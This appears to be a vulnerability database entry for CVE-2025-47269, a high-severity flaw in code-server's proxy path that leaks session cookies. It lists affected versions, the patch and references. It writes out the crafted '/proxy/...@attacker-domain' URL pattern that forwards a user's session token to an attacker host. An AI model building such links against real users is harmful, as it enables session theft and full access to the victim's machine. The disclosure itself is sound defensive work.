CVE-2025-47269
HIGH8.3EPSS 0.33%code-server's session cookie can be extracted by having user visit specially crafted proxy URL
描述
### Summary A maliciously crafted URL using the `proxy` subpath can result in the attacker gaining access to the session token. ### Details Failure to properly validate the port for a `proxy` request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/[email protected]/path` would be proxied to `[email protected]/path` where the attacker could exfiltrate a user's session token. ### Impact Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to `/proxy`. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. ### Patches Patched versions are from [v4.99.4](https://github.com/coder/code-server/releases/tag/v4.99.4) onward.
受影響套件(1)
- npm/code-serverfrom 0, < 4.99.4
CVSS 分數
| 來源 | 版本 | 嚴重程度 | 向量 |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH8.3 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L |
參考連結(5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2025-47269
- PATCHhttps://github.com/coder/code-server
- WEBhttps://github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299e
- WEBhttps://github.com/coder/code-server/releases/tag/v4.99.4
- WEBhttps://github.com/coder/code-server/security/advisories/GHSA-p483-wpfp-42cj